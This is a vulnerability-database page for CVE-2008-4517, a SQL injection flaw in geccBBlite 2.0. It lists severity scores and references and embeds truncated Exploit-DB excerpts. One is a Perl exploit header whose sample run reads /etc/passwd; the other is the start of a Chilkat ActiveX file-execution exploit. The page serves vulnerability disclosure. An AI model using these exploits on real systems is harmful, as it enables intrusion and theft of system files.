CVE-2008-4517
Published 2008-10-09
CVE-2008-4517: SQL injection vulnerability in leggi.php in geccBBlite 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority P3 40 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geccbblite | geccbblite | — | — |
No detection rules found.
Exploit-DB
geccBBlite 2.0 - 'id' SQL Injection
exploitdb·2008-10-05
CVE-2008-4517 geccBBlite 2.0 - 'id' SQL Injection
---
#!/usr/bin/perl
################################
## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
## D.O.M Team
## piker,ka0x,an0de,xarnuz
## 2008 Security Researchers
################################
##
## geccBBlite Forums SQL Injection Exploit
##
## This exploit tries to read an
## arbitrary file.
##
################################
# piker@domlabs:~/advisories$ perl geccBB.pl http://localhost/geccBB /etc/passwd
#[+] Prefix: geccBB_
#[+] File HEX: 0x2f6574632f706173737764
#[+] Host: http://localhost/geccBB/
#[+] File content:
#daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/#bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/
Exploit-DB
Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
exploitdb·2008-09-27
CVE-2008-7022 Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
---
##################Chilkat IMAP ActiveX File Execution&IE DoS ################
www.chilkasoft.com
####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum
In the wild...
#####################################################################################
File: ChilkatMail_v7_9.dll
ProgID: ChilkatMail2.ChilkatMailMan2.1
CLSID: 126FB030-1E9E-4517-A254-430616582C50
Description:
Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.
Tested on IE 6,Win xp sp2
#####################################################################################
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat IMAP ActiveX\Chilk
No writeups or analysis indexed.
http://securityreason.com/securityalert/4382
http://www.securityfocus.com/bid/31585
https://exchange.xforce.ibmcloud.com/vulnerabilities/45682
https://www.exploit-db.com/exploits/6677
Published: 2008-10-09